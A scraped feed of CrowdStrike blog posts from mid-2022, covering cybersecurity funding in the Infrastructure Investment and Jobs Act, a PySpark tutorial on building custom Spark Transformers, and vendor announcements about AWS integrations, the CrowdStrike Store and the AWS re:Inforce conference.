🔒
There are new articles available, click to refresh the page.
Before yesterdayCrowdStrike

Securing Our Nation: How the Infrastructure Investment and Jobs Act Delivers on Cyber Resiliency

1 August 2022 at 15:21

Attacks and intrusions on our nation’s vital infrastructure — our electrical grid, water systems, ports and oil supply — are on the rise. For example, as reported by the Pew Charitable Trust in March 2021, hackers changed the chemical mixture of the water supply in Oldsmar, Fla., increasing by 100 times the level of sodium hydroxide (lye) in the water supply. In June 2021, Reuters published an article about how poor cyber hygiene, ineffective cybersecurity practices and the danger of stolen credentials impacted millions of people when a cyberattack interrupted the flow of fuel on the East Coast of the United States. As we hyperconnect our cities and communities, security must be at the forefront of every plan and design.

Recognizing the required investment in the United States, Congress passed the Infrastructure Investment and Jobs Act (IIJA) in November 2021. The IIJA authorizes roughly $1 trillion USD in funding for a number of initiatives that include improving our highways, repairing bridges, creating smart cities, studying the effects of climate change, developing new clean energy technology and both improving and hardening our electrical and water utilities.

For anyone who’s not accustomed to reading legislation, 1,000 pages of complex legislation can be intimidating. States and large cities, as well as larger businesses supporting critical infrastructure, may have entire divisions or established working groups dedicated to understanding and pursuing this and other grant programs. I can only imagine there are numerous small and medium-sized companies, as well as local and tribal governments who, like me, have little experience in taking advantage of the incredible funding opportunities in this and other grants across the federal government.

Here, I will identify some parts of the IIJA your organization may be able to take advantage of.  Whether you have people who work with federal grant funding, or not, awareness of this capability to make up for budget shortfalls while building our critical infrastructure is important.  We created an easy-to-read document that outlines cybersecurity-specific sections of the Act and the CrowdStrike solution in our “How CrowdStrike Supports the IIJA” white paper.

Key IIJA Cybersecurity Funding Provisions

Key provisions of the IIJA provide funds to federal agencies and state, local, tribal and territorial governments, as well as public and private utility and transportation entities, to implement cybersecurity solutions that promote stronger cybersecurity resilience and the ability to assess, detect, identify, mitigate and respond to cyber threats today and into the future.

In particular, the IIJA calls out the U.S. Department of Transportation (DOT), Department of Energy (DOE), Department of Homeland Security (DHS) and Environmental Protection Agency (EPA) for specified cybersecurity funding. Within these provisions, the federal government will provide $3.5 billion USD for key projects that include requirements to improve cybersecurity posture and resiliency, promote intelligence sharing and respond to attacks. 

DHS: Layering Our Defenses and Coordinating Our Response

The Cyber Response and Recovery Act and the new State and Local Cybersecurity Grant Program provide over $1.1 billion USD to state, local, tribal and territorial governments including public-private partnerships. These funds are available for seven and five years, respectively, and seek to address cyber risks and threats by supporting threat hunting, network protection and the replacement and modernization of tools and systems. The Cybersecurity Infrastructure Security Agency (CISA), a component agency of DHS, is tasked with defending the infrastructure of the internet and improving its resilience and security for the nation. Each organization must submit its cybersecurity plan when applying for grant funding and, in the case of the State and Local Cybersecurity Grant Program, successful applicants will receive up to 90% of required funding for the first year. 

DOT: Improving and Securing Our Roads, Bridges and Ports 

As the U.S. transportation system’s networks evolve into a hyperconnected mesh of data and information to make them more efficient, their attack surface exponentially increases. The IIJA directs two specific programs under the DOT to strengthen the cybersecurity posture of the transportation system. The Strengthening Mobility and Revolutionizing Transportation (SMART) grant provides $500 million USD over five years to state, local and tribal governments, and public toll authority and metropolitan planning agencies, to ensure the security of smart cities by implementing cybersecurity best practices. The second program, Advanced Research Projects Agency-Infrastructure (ARPA-I), provides unspecified funding for the advancement of cybersecurity technology solutions that promote the resiliency of roads, highways, bridges, airports, seaports and railways against cyberattacks.

DOE: Keeping the Lights On

The resiliency of the U.S. electrical and power system is critical to national security. Recent years have shown how delicate the grid is, and our adversaries have demonstrated they are adept at attacking power grids. Seven programs provide over $1 billion USD in investment funding to secure research, modernization and resiliency in the energy sector and electrical grid. These projects include maturity models and threat assessments, protection, detection, response and recovery from cyber threats to pilot projects to gain experience with new cyber technology. Each of these provides state, local, tribal and territorial governments, as well as public and private electrical utility companies, with the ability to harden and improve their network defenses, expand cyber defense capabilities and capacity, and gain a clear understanding of their environment and the efficacy of their cybersecurity plans. 

EPA: Ensuring Our Drinking Water Is Safe and Sewers Keep Flowing 

With two programs valued at $375 million USD over five years, the EPA’s Midsize and Large Drinking Water System Infrastructure Resilience and Sustainability Program, and the Clean Water Infrastructure Resiliency and Sustainability Program, seek to improve the resiliency of the nation’s water system. This section of the IIJA directs public and private water providers and state and local governments to develop and implement projects that reduce the cybersecurity vulnerabilities of water systems in communities across the United States. 

The CrowdStrike Mission: We Stop Breaches

The integrated CrowdStrike security platform provides governments and organizations with the optimal solution to protect and defend their environments while taking advantage of IIJA funding. We offer endpoint protection capabilities plus a 24/7/365 managed services offering designed to augment teams that may not be staffed to support immediate response — solution attributes that are specifically mentioned in numerous sections of the IIJA. And with over a decade of proven performance in preventing breaches and ensuring resiliency of small, medium and large corporations and governments worldwide, CrowdStrike is the clear choice for securing our critical infrastructure and your valuable data during a cyberattack or intrusion.

In addition, CrowdStrike has a robust team of threat advisors and intelligence experts ensure the rapid flow of threat and adversary contextual information, increasing the strategic impact of information across your environment. Recognizing that 80% of attacks in 2021 were identity-based, CrowdStrike now offers the industry’s first fully managed identity threat protection solution delivering identity threat prevention and IT policy enforcement so that IT and security teams can sleep better at night.  In many cases the adversary manages to bypass standard security measures using valid, stolen credentials. Organizations are now demanding these integrated capabilities where services are delivered through a single, lightweight sensor implemented in on-premises, hybrid and cloud environments.  Ultimately there is a need to provide immediate protection, decreasing risk while allowing clients to focus on providing their core services and products.

The CrowdStrike Falcon® platform provides an increasingly expansive ecosystem of protection capabilities, from endpoint and cloud security, to threat intelligence, identity protection and IT operations. CrowdStrike’s open ecosystem and growing list of industry-leading partnerships enhances and extends our powerful protection across critical areas like operational technology (OT), Internet of Things (IoT) network security and more, empowering forward-leaning organizations to take advantage of the funding in the IIJA. Our integrated Falcon platform capabilities and extended security ecosystem accessible via the CrowdStrike Store provide answers to the challenges and gaps outlined in the IIJA.

Are you interested in learning more about how CrowdStrike can assist you in your journey and help get the funding you need? Now is the time to take advantage of this opportunity. Adversaries will not wait — and neither should you. Whether you provide electricity to local communities, are responsible for designing and building our nation’s bridges and roads, or serve our citizens in local, state or tribal governments, we are here to help. Schedule a meeting with one of our professionals to learn more about how we can help you harden your network and improve your cyber resiliency.

Additional Resources

A Deep Dive into Custom Spark Transformers for Machine Learning Pipelines

27 July 2022 at 15:34
  • Modern Spark Pipelines are a powerful way to create machine learning pipelines
  • Spark Pipelines use off-the-shelf data transformers to reduce boilerplate code and improve readability for specific use cases
  • This blog outlines how to construct custom Spark Transformers to integrate with Spark Pipelines
  • Learn how to identify the components of each Transformer class member function and correctly serialize and deserialize the transformer to and from disk 

CrowdStrike data scientists often explore novel approaches for creating machine learning pipelines especially when processing a large volume of data. The CrowdStrike Security Cloud stores more than 15 petabytes of data in the cloud and gathers data from trillions of security events per day, using it to secure millions of endpoints, cloud workloads and containers around the globe with the power of machine learning and indicators of attack.

When processing so much data, making use of modern Spark Pipelines is a powerful way to use off-the-shelf libraries to reduce boilerplate code and improve readability. Because these Transformers may not fit all use cases, it’s important to understand how to currently construct a custom Spark Transformer that integrates with Spark Pipelines and understand the components of Transformer. 

Pipeline Framework

Note: For this blog, we assume usage of PySpark version 3.0+

Machine learning workflows generally consist of multiple high-level steps:

  • Preprocessing your input data via some extract, transform and load (ETL) steps
  • Splitting the dataset for either cross validation or train/test/validate split
  • Training the model
  • Tuning hyperparameters

The code and structure of each step vary greatly and if inconsistently implemented, can affect readability and flexibility of a data scientist’s workflow. In addition, data scientists often reuse components of their workflow with slight modifications in repeated experiments. This is why commonly used frameworks like scikit-learn and Spark have created pipeline frameworks to more flexibly express and assemble common high-level workflows. 

Such frameworks give the user a consistent approach to build out the steps required to conduct experiments and are easy to extend. A less obvious advantage of this frame is the reduction of complexity for collaborators. Pipelines provide a common code structure which is more readable and thus reduces the barrier of entry into your codebase.

The following is a simple example of a dataset using a pipeline:

# Setup a simple pipeline to tokenize -> hashed term frequency vector -> train logistic regression
tokenizer = Tokenizer(inputCol="text", outputCol="words")
hashingTF = HashingTF(inputCol=tokenizer.getOutputCol(), outputCol="features")
lr = LogisticRegression(maxIter=10, regParam=0.001)
pipeline = Pipeline(stages=[tokenizer,
                            hashingTF,
                            lr])
 
model = pipeline.fit(input_dataset)

Because experiments should be reproducible, we may need to save information regarding the state of transformation and model hyperparameters. Without a pipeline, each transformer and model may need to be saved separately, and the order of transformation must be manually preserved. Using Spark Pipeline allows us to save the entire pipeline (including transformer states, order and hyperparameters) as a single object and reload easily. From an experimentation and engineering perspective, this reduces the ambiguity of experiment configurations and makes integrating the model and pipeline downstream more straightforward.

# save and reload the entire pipeline
model.save(save_path)
 
# use pipeline to run entire process again
loaded_pipeline = Pipeline.load(save_path)
loaded_predictions = loaded_pipeline.transform(test) 
 
# output
``` 
>> loaded_pipeline.stages
# output shows the stages in the loaded pipeline
[Tokenizer_7397a14f7aaa,
 HashingTF_4c188d1e40c1,
 LogisticRegressionModel: uid=LogisticRegression_a3ac1d359fb0, numClasses=2, numFeatures=12]
```

Custom Data Transformations

With improvements in flexibility and readability comes some additional work. We must conform our code with a structure that’s acceptable by modern pipelines. One very common set of tasks used in pipelines is the transform step of the ETL process, where we must take our raw data and pass it through a series of data transformation steps. The output of these transforms are vectors and labels used for model training. Though many manipulations on Spark Data can already be done through either native functions or Spark SQL, there are often custom transforms we must apply to every row of our data that require custom code. 

Let’s take for example a simple text manipulation Spark Dataset containing id, text and label  columns:

df = spark_session.createDataFrame([
    (0, "a b c d e spark", 1.0),
    (1, "b d", 0.0),
    (2, "spark f g h", 1.0),
    (3, "hadoop mapreduce", 0.0)
], ["id", "text", "label"])
 
# Produces the following table:
```
+---+----------------+-----+
| id|            text|label|
+---+----------------+-----+
|  0| a b c d e spark|  1.0|
|  1|             b d|  0.0|
|  2|     spark f g h|  1.0|
|  3|hadoop mapreduce|  0.0|
+---+----------------+-----+
```

Starting with a Basic Transformation

It is recommended that data transformation should be expressed as Spark SQL when possible due to its under-the-hood integration with Spark query optimizers and JVM. However, this is sometimes not possible with more complex transformations. In such cases, we can use Spark User Defined Function (UDF) to write our transformations. (Note that UDFs will always be slower than native Spark SQL.)

We’d like to apply a transform such that if we see the string spark, we will append an additional signal string to the end of the text. A simple way to apply this transform to each row is to write this function, then run it as a UDF:

from pyspark.sql.functions import udf
from pyspark.sql.types import StringType
 
# Define our transformation
def append_string(s, append_val=""):
    """
    If we see the word `spark` in s, append a string to the current string.
    """
    if s and 'spark' in s:
        return s + append_val
    return s
 
 
# Wrap the transformation as a UDF
append_udf = udf(lambda row: append_string(row, " hadoop"), StringType())
 
# Apply the UDF to our Dataset and create a resultant column called `appended_text`
df.withColumn("appended_text", append_udf(col("text"))) \
  .show()   
 
 
# Produces the following output table:
```
+---+----------------+-----+----------------------+
|id |text        	|label|appended_text     	|
+---+----------------+-----+----------------------+
|0  |a b c d e spark |1.0  |a b c d e spark hadoop|
|1  |b d         	|0.0  |b d               	|
|2  |spark f g h 	|1.0  |spark f g h hadoop	|
|3  |hadoop mapreduce|0.0  |hadoop mapreduce  	|
+---+----------------+-----+----------------------+
 
```

Note that although this will apply the correct transform, there are a few inconveniences:

  • We cannot save the internal state of the transform — for example, what value we used for the append_val argument in append_string(). This is especially important if we have many inputs that need to be set before we run our transform.
  • We cannot use it as part of a Pipeline, so we would need to either create a Pipeline which starts after this transform step, or write our own subsequent data transforms manually. This means we need to programmatically ensure that code between experiments stays the same. 

Converting Transformation Function Into a Custom Transformer

To make our transformation function both savable and loadable and usable as part of a Pipeline, we will inherit from the SparkML Transformer class along with a few mixins to ensure API conformity with SparkML. The converted custom transformer would look like the following:

import append_string  # this is the function we wrote above
from pyspark.sql.functions import udf
from pyspark.sql.types import StringType
from pyspark import keyword_only  # Note: use pyspark.ml.util.keyword_only if Spark < 2.0 from pyspark.ml import Transformer from pyspark.ml.param.shared import HasInputCol, HasOutputCol, Param, Params, TypeConverters from pyspark.ml.util import DefaultParamsReadable, DefaultParamsWritable class StringAppender(Transformer, # Base class HasInputCol, # Sets up an inputCol parameter HasOutputCol, # Sets up an outputCol parameter DefaultParamsReadable, # Makes parameters readable from file DefaultParamsWritable # Makes parameters writable from file ): """ Custom Transformer wrapper class for append_string() """ # append_str is a value which we would like to be able to store state for, so we create a parameter. append_str = Param( Params._dummy(), "append_str", "Value we want to append with", typeConverter=TypeConverters.toString, # This will allow code to automatically try to convert to string ) @keyword_only def __init__(self, inputCol=None, outputCol=None, append_str=None): """ Constructor: set values for all Param objects """ super().__init__() self._setDefault(append_str=None) kwargs = self._input_kwargs self.setParams(**kwargs) @keyword_only def setParams(self, inputCol=None, outputCol=None, append_str=None): kwargs = self._input_kwargs return self._set(**kwargs) def setAppendStr(self, new_append_str): return self.setParams(append_str=new_append_str) # Required if you use Spark >= 3.0
    def setInputCol(self, new_inputCol):
        return self.setParams(inputCol=new_inputCol)
  
    # Required if you use Spark >= 3.0
    def setOutputCol(self, new_outputCol):
        return self.setParams(outputCol=new_outputCol)
  
    def getAppendStr(self):
        return self.getOrDefault(self.append_str)
  
    def _transform(self, dataset):
        """
        This is the main member function which applies the transform to transform data from the `inputCol` to the `outputCol`
        """
        if not self.isSet("inputCol"):
            raise ValueError(
                "No input column set for the "
                "StringAppenderTransformer transformer."
            )
        input_column = dataset[self.getInputCol()]
        output_column = self.getOutputCol()
        append_str = self.getAppendStr()
        udf_func = lambda x: append_string(x, append_str)
        data_type = StringType()
         
        return dataset.withColumn(output_column,
                                  udf(udf_func, data_type)(input_column))

Let’s break down some components of this wrapper and discuss each in detail:

  • Transformer Abstract Base Class
  • Param Type Member Variables
  • @keyword_only, Constructor, and Decorator and Input Persistence
  • Mixins: HasInputCol, HasOutputCol
  • Traits: DefaultParamsReadable, DefaultParamsWritable

Transformer Abstract Base Class

Every custom transformer must at least inherit pyspark.ml.Transformer as the abstract base class.

We must also at the minimum override the _transform() function so that the Transformer knows how to transform out data. The input passed to  _transform() is the entire input Dataset including all the columns so we will need to retrieve the input and output columns (usually set by the constructor).

Now that we have the input dataset , input_column  name, and output_column  name, we can wrap our transformation function append_string(). Note that if the transformation function requires more than a single input, you will need to convert the function into one which accepts a single input. You can do this using a lambda function.

# Code snippet of _transform():
        udf_func = lambda x: append_string(x, append_str)  # append_string() takes two inputs, we can wrap it with a lambda
        data_type = StringType()
         
        # Note we need to wrap udf_func with pyspark.sql.functions.udf
        return dataset.withColumn(output_column,
                                  udf(udf_func, data_type)(input_column))

Param Type Member Variables

As part of constructing the custom transformer, we will need to generate pyspark.ml.param.shared.Param objects for each of the following:

  • an input_column name which indicates the data that should be transformed
  • the output_column  where the transformed data should be written.
  • any additional data that need to be stored by the Transformer (e.g., append_str, the string that in we want to append in our example)

Param  objects can be set to a value like normal variables but enable us to more easily read/and write them to/from file using Spark’s native methods. Generally these can be set at initialization with the constructor (__init__()). However, because we inherit from HasInputCol and HasOutputCol, the Param type member variables inputCol and outputCol respectively are created automatically for us. Thus we only need to create the append_str Param object. See the next section for more information on the mixins.

append_str = Param(
        Params._dummy(),
        "append_str",
        "Value we want to append with",
        typeConverter=TypeConverters.toString,   # This will allow code to automatically try to convert to string
    )

The typeConverter parameter here helps implicitly apply type conversions if the data type is different.

Mixins: HasInputCol, HasOutputCol

Inheriting mixins HasInputCol and HasOutputCol allow us to reduce the amount of boiler plate code we must write to create. HasInputCol will create a Param member variable for your custom transformer class called inputCol  that can then be set/retrieved/written to file. Same effect for HasOutputCol and the member variable outputCol. Additionally each mixin here will also initialize default values for their member variable.

Optionally, you can implement setInputCol()  and setOutputCol() to conform more closely with standard transformers available in SparkML.

There are also additional mixins that can be inherited if needed (e.g., a list of input columns or output columns). For more information, please refer to the pyspark API.

@keyword_only Decorator, Constructor and Input Persistence

To correctly create a custom transformer, we must be able to store the inputs used to create the transformer. The inputs will be stored as Param type member variables within our custom transformer class. Let’s break down how this is done.

@keyword_only
def __init__(self, inputCol=None, outputCol=None, append_str=None):
    """
    Constructor: set values for all Param objects
    """
    super().__init__()
    self._setDefault(append_str=None)
    kwargs = self._input_kwargs
    self.setParams(**kwargs)

Here, @keyword_only  will store input keyword arguments (inputCol, outputCol and append_str in our example) as an internal map inside of the Transformer (in a protected variable called _input_kwargs). After the input arguments are stored, we must manually set any custom variable (using _setDefault()) we pass in that isn’t part of the mixins we inherited from. Specifically, because we inherited from HasInputCol  and HasOutputCol, we do not need to manually set.  This will ensure we can safely retrieve the variables later using the inherited member function getOrDefault().  

Next we set the Param type member variables (by calling setParams()) using our map _input_kwargs so that we can correctly retrieve the true assigned values when we need them later. 

Finally, when we decide to retrieve the variables such as inputCol or append_str , we will need to make a call to getOrDefault() like self.getOrDefault(self.append_str). This is different from how we normally retrieve a variable in Python because each variable is a Param object. See definition for function getAppendStr() for more detail.

Traits: DefaultParamsReadable, DefaultParamsWritable

The final component of creating a custom transformer is to inherit traits DefaultParamsReadable and DefaultParamsWritable to allow us to correctly read to file and write from file both as part of a pipeline or by itself. These traits will read/write the Params we have created to file.

Not inheriting these traits may lead to errors like the following when attempting to save a customer transformer:

ValueError: ('Pipeline write will fail on this pipeline because stage %s of type %s is not MLWritable', 'StringAppender_281f47e48529', <class '__main__.StringAppender'>)

Using a Custom Transformer as Part of a Pipeline

Once the custom transformer is built, it’s easy to attach the transformer to add this component to a pipeline. We will need to initialize our custom transformer by setting the correct input/output columns and the append string to use. Then we will add it as a stage to our pipeline. For example, if we extend the pipeline from section “Pipeline Framework” above, we will have:

from pyspark.ml import Pipeline
from pyspark.ml.classification import LogisticRegression
from pyspark.ml.feature import HashingTF, Tokenizer
from custom_transformer import StringAppender  # This is the StringAppender we created above
 
appender = StringAppender(inputCol="text", outputCol="updated_text", append_str=" hadoop")  # initialize our custom transformer
tokenizer = Tokenizer(inputCol="text", outputCol="words")
hashingTF = HashingTF(inputCol=tokenizer.getOutputCol(), outputCol="features")
lr = LogisticRegression(maxIter=10, regParam=0.001)
pipeline = Pipeline(stages=[appender,   # add the transformer as a stage
                            tokenizer,
                            hashingTF,
                            lr])

As we can see, converting a custom processing function into a custom transformer step requires us to implement the pattern discussed in this post. Although there are some non-trivial components to wrapping functions, the pattern for this work is consistent so it can be applied to most processing functions. Additionally, custom transformers can then be used as part of a pipeline to further improve code readability and integration with native spark pipeline frameworks. Finally, setting up your processing functions as transformers allows us to save entire pipelines to disk, which can be more easily shared and used by collaborators down-stream of your workflow.

References

Additional Resources

  • Learn more about today’s adversaries and how to combat them at Fal.Con 2022, the cybersecurity industry’s most anticipated annual event. Register now and meet us in Las Vegas, Sept. 19-21! 
  • Learn more about the powerful, cloud-native CrowdStrike Falcon® platform by visiting the product webpage.
  • Get a full-featured free trial of CrowdStrike Falcon Prevent™ and learn how true next-gen AV performs against today’s most sophisticated threats.

CrowdStrike and AWS Expand Partnership to Offer Customers DevOps-Ready Security

26 July 2022 at 16:45

Cloud-based services are augmenting business operations and being adopted at a record pace. In fact, ​Gartner® estimates “more than 85% of organizations will embrace a cloud-first principle by 2025 and will not be able to fully execute on their digital strategies without the use of cloud-native architectures and technologies.”

As cloud adoption continues unabated, adversaries are becoming increasingly adept at finding security gaps to exploit cloud environments. According to the CrowdStrike 2022 Global Threat Report, cloud-based services are “increasingly abused by malicious actors in the course of computer network operations (CNO), a trend that is likely to continue in the foreseeable future as more businesses seek hybrid work environments.”

Defending cloud-based services requires securing a rapidly growing attack surface. DevOps and security teams must enforce continuous monitoring and protection from the development process to runtime to ensure DevOps-ready security. Agentless-only solutions only offer partial visibility and lack remediation capabilities. Securing the cloud requires an approach that combines agentless scanning with agent-driven protection, ensuring that DevOps and security teams are able to deploy the protection they need regardless of their environment. They need integrated protection and visibility to understand and stay ahead of modern adversaries.

CrowdStrike continues to extend our partnership with AWS to provide DevOps-ready security, and this week we’re making multiple key announcements to underscore our commitment: our Threat Detection and Remediation distinction in the AWS Security Competency; our role as a Launch Partner of AWS services; and our Service Ready designation.

AWS Security Competency Re-Launch

CrowdStrike is excited to announce today that it has achieved Threat Detection and Remediation distinction in the AWS Security Competency. This designation recognizes that CrowdStrike has successfully met AWS’s technical and quality requirements for providing customers with a deep level of protection and expertise in threat detection and remediation to help them achieve their cloud security goals.

Achieving the Threat Detection and Remediation distinction in the AWS Security Competency differentiates CrowdStrike as an AWS partner that provides specialized solutions designed to help companies — from startups and mid-sized businesses to the largest global enterprises — to adopt, develop and deploy security into their AWS environments, increasing their overall security posture on AWS. To receive the designation, partners must possess deep AWS expertise and deliver solutions seamlessly on AWS.

CrowdStrike Named a Launch Partner of AWS Services

Humio-powered Amazon GuardDuty Malware Protection: Amazon is launching Amazon GuardDuty Malware Protection for potentially compromised Amazon Elastic Compute Cloud (Amazon EC2) instances and containers running on Amazon EC2 (Amazon Elastic Kubernetes Service [Amazon EKS], Amazon ECS and customer-managed Kubernetes). Once Amazon GuardDuty Malware Protection enhancement is enabled and Amazon GuardDuty detects suspicious activity on a workload, it will initiate a malware scan on the associated Amazon EC2 instance. With the new Amazon GuardDuty Malware Protection, customers will have more context to detect malicious software as the source of suspicious behavior so they can take appropriate response actions. Amazon GuardDuty Malware Protection detects malware on Amazon Elastic Block Store (Amazon EBS)-backed Amazon EC2 instances and containers. If malware is detected during the scan, an additional finding will be generated by Amazon GuardDuty.

As a launch partner for Amazon GuardDuty Malware Protection, CrowdStrike provides customers with a specific Humio shipper for these Amazon GuardDuty logs to ingest all events identified, including the new types introduced with this release. This combination will include queries and dashboards for customers to contextually analyze, report and act based on the findings in Amazon GuardDuty. Customers will now have greater extensibility to use the breadth of services at AWS to simplify routing of logs to Humio, enabling accelerated threat hunting and search across their AWS footprint for novel and advanced cyber threats. As a launch partner, CrowdStrike provides customers with:

  • A defense-in-depth approach to protect instances that may not be protected or address blind spots where CrowdStrike Falcon® agents aren’t deployed
  • Context enrichment from other applications and platform logs
  • Automated remediation such as getting notified of Humio’s built-in actions or isolating an Amazon EC2 instance for incident response with a webhook

Figure 1. Amazon GuardDuty dashboard in the CrowdStrike Humio console

AWS Service Ready Achievements

The AWS Service Ready Program is designed to validate software products that are built by AWS partners and work with specific AWS services. These software products are technically validated by AWS Partner Solution Architects for their sound architecture and adherence to AWS best practices, and for their market adoption including customer successes. CrowdStrike has completed all of the requirements for two Service Ready Programs:

AWS Graviton Ready: AWS Graviton processors are designed to deliver the best price performance for cloud workloads running in Amazon EC2. As an AWS Graviton Ready Partner, CrowdStrike provides:

  • Industry-leading protection across AWS Graviton-powered workloads through machine learning and artificial intelligence
  • Unparalleled visibility and alert context across compute services powered by Graviton processors, including Amazon EC2
  • Unified security across endpoints, cloud workloads and identity

AWS PrivateLink Service Ready: AWS PrivateLink provides private connectivity between VPCs, AWS services, and your on-premises networks, without exposing your traffic to the public internet. AWS PrivateLink makes it easy to connect services across different accounts and VPCs to significantly simplify your network architecture. CrowdStrike is now an AWS PrivateLink Ready Partner, and the integration enables customers sensor-to-cloud traffic to flow via AWS PrivateLink, reducing internet exposure and simplifying network architectures. 

The Powerful Benefits of CrowdStrike and AWS

Our joint solutions and integrations in various AWS services are powered by the CrowdStrike Security Cloud and the CrowdStrike Falcon platform, which leverage real-time indicators of attack, threat intelligence, evolving adversary tradecraft and enriched telemetry from across the enterprise to deliver hyper-accurate detections, automated protection and remediation, elite threat hunting and prioritized observability of vulnerabilities. Customers benefit from better protection, better performance and immediate time-to-value. With over a dozen service-level integrations available, joint AWS and CrowdStrike customers are provided with a consistent security posture between their on-premises workloads and those running in the AWS cloud for DevOps-ready security.

  • Unified hybrid security experience: CrowdStrike supports secure deployment and management of AWS Graviton processors, and workloads across Amazon EKS, AWS Fargate, and Amazon EKS Anywhere. With a single lightweight agent and single management console, customers can experience a unified, end-to-end experience from the host to the cloud. No matter where compute workloads are located, customers benefit from visibility, compliance and threat detection and response to outsmart the adversary.
  • A modern and consistent security approach: The latest integrations, support and Service Ready achievements from CrowdStrike for AWS allow organizations to implement a modern enterprise security approach where protection is provided across your AWS infrastructure to defend against sophisticated threat activity.

Try a 15-day trial to see how the CrowdStrike Falcon platform’s superior cyberattack prevention, malicious activity detection and immediate response capabilities can be fully deployed in minutes to protect your business.

Endnotes

  1. Gartner, “Gartner Says Cloud Will Be the Centerpiece of New Digital Experiences,” November 10, 2021.

GARTNER is a registered trademark and service mark of Gartner, Inc. and/or its affiliates in the U.S. and internationally, and is used herein with permission. All rights reserved.

Additional Resources

Address the Cybersecurity Skills Shortage by Building Your Security Stack with the CrowdStrike Store

26 July 2022 at 12:04

The increase in attack sophistication coupled with the decline of skilled security staff continues to put pressure on organizations and their teams by minimizing their ability to effectively see and control risks within the enterprise. This is only made more difficult as teams find themselves patching together disparate solutions, resulting in labyrinthian security stacks and a heavily siloed environment. To move beyond these challenges, organizations seek to employ innovative technology, processes and people that boost unification across their technology and teams, reducing visibility gaps and enabling a more effective security strategy. 

By implementing effective, interoperable IT and security solutions, organizations can benefit from shared data and layered security capabilities, without additional operation friction, for enhanced clarity and control around potential threats throughout their environment. The CrowdStrike Store is a one-stop-shop IT and cybersecurity software-as-a-service (SaaS) marketplace that allows you to easily discover and implement best-of-breed and interoperable solutions that address your unique use cases, unify your stack and simplify deployment. 

The CrowdStrike Store has recently added new partner applications and integrations, and a free partner plugin, to help seamlessly secure your device management, assets, identities and Internet of Things (IoT) environment. With the release of the JumpCloud application available for free trial and new technology integrations with Asimily, Beyond Identity and SafeBreach, you can ensure more holistic visibility for your team, faster time-to-value and a higher return on investment. 

The CrowdStrike Store team will cover these new integrations and guide you in selecting the right IT and security tools for truly empowering and securing your organization in our upcoming CrowdCast, Unifying Your Security Solutions: The Ultimate Guide to Selecting the Right Tools with the CrowdStrike Store. Join the session to learn about the essentials of building a modern IT and security stack with unified tools that accelerate your security team’s efficiency and efficacy.

Have OS Patching and Full Disk Encryption at Your Fingertips with JumpCloud

The increase of heavily distributed environments has made it difficult for organizations to secure their widespread remote workers and ensure they are operating on trusted, encrypted and up-to-date devices. With this complicated dispersed environment, teams lack visibility, making it hard for them to understand the status of device security and ensure coverage across multiple operating systems. To add to this, without holistic visibility and control of devices, meeting audit and compliance standards will likely become impossible.

JumpCloud, a CrowdStrike Falcon Fund partner, recently released a new application in the CrowdStrike Store that enables teams by providing OS patching and full disk encryption at their fingertips. With CrowdStrike and JumpCloud, users can easily leverage rich endpoint data and capabilities to control and secure dispersed devices. By centralizing device management through the JumpCloud Directory Platform, your team can easily implement enhanced security without friction. 

JumpCloud integrates with CrowdStrike Falcon Real Time Response (RTR) commands to help you automate OS patching from a single interface to keep every device up to date with customizable user notifications and device specific groups. JumpCloud also leverages CrowdStrike’s enriched endpoint telemetry to help provide additional environmental context, enabling secure devices with full disk encryption across your entire fleet. By easily tracking which devices were updated or encrypted, and any permission changes with out-of-the-box logging and reporting, you can ensure your organization is compliant. 

The JumpCloud agent can be simply deployed to Windows devices through the CrowdStrike Falcon® console, drastically cutting implementation time and helping you realize value faster.

Elevate Your Security with New Technology Integrations 

CrowdStrike has also expanded its ecosystem with new technology integrations built by Asimily, Beyond Identity and SafeBreach that leverage the Falcon platform to help unify your tools, get a higher return on your investments and enable a holistic security strategy. 

Asimily, a risk management platform for IoT devices and web-connected equipment, integrates by ingesting and querying CrowdStrike’s rich threat intelligence data to then correlate with its anomaly alerts and threat insights, providing you with layered visibility and additional threat context surrounding indicators of compromise (IOCs) across your environment. 

Beyond Identity integrates with the Falcon platform and leverages CrowdStrike’s Zero Trust Assessment (ZTA) score to help your team continuously monitor and enforce risk-based access policies using granular user and device signals. By checking the presence and state of the Falcon sensor and a device’s ZTA score, you can easily block access or quarantine a device during an authentication session for enhanced Zero Trust

Finally, SafeBreach’s breach and attack simulation solution integrates with the Falcon platform and Falcon X to provide automatically correlated simulated attacks and layered visibility into the performance of security controls to help harden your organizational posture. 

With these new additions to the CrowdStrike ecosystem, you can more easily integrate tools across your stack to remove operational friction and improve your security team’s visibility across distributed environments.

Build Your Modern Security Stack with the CrowdStrike Store

To effectively address evolving adversaries tactics, limited resources and a lack of visibility caused by siloed technology, organizations must empower their teams with the best unified tools to accelerate efficiency and efficacy at scale. To help you find the right tools that enable your business to more quickly realize value, the CrowdStrike Store provides easy access to a best-of-breed ecosystem of CrowdStrike products and partner integrations that minimize implementation complexity and empower the unification of IT and security stacks. By pairing CrowdStrike’s unified platform with partner solutions, you can eliminate blind spots and ensure that your organization has true end-to-end coverage of the entire threat landscape to stop breaches.

Learn more about how you can select the best tools to unify your stack and address your unique use cases by joining the CrowdStrike Store team’s CrowdCast on July 27. You’ll get key tips for choosing the right IT and security solutions to empower and secure your entire organization, and an inside look at new additions to the CrowdStrike ecosystem.

Additional Resources

Think It, Build It, Secure It — CrowdStrike at AWS re:Inforce 2022

19 July 2022 at 17:39

For two days in July, Boston will be the epicenter of innovation in the world of cloud security — and we’re excited to see you there in person! As a proud sponsor of AWS re:Inforce 2022 (July 26-27), CrowdStrike is coming to town to meet with customers, partners and prospects to show how we’re protecting cloud environments against increasing adversary attacks. 

Adversary attacks on cloud environments have grown more aggressive and damaging. Adversaries view the cloud as a soft target, rife with vulnerabilities and misconfigurations to exploit. Stopping cloud breaches requires a comprehensive, platform approach to security that combines the power of agent-based and agentless protection that covers all workloads. 

We have a host of activities planned to help you better understand your cloud risk and how CrowdStrike’s adversary-focused approach to cloud security can keep you ahead of advancing attacks. We’ll be hosting speaking sessions, showing off new products, and providing one-on-one expert insight on the greatest risks your cloud environments face. Most importantly you’ll learn how to mitigate those risks with the CrowdStrike Falcon® platform.

We hope you’ll have a chance to stop by to visit us at Booth #203 to talk to our experts, see our demos, and even register to win one of our new limited-edition adversary figures! 

Visit CrowdStrike at Booth #203

The CrowdStrike experience will feature in-depth demos, theater presentations, partner highlights and cybersecurity experts on standby to discuss the latest insights into the threat landscape and how CrowdStrike is helping organizations around the world defend against attack. 

Featured Demo Stations

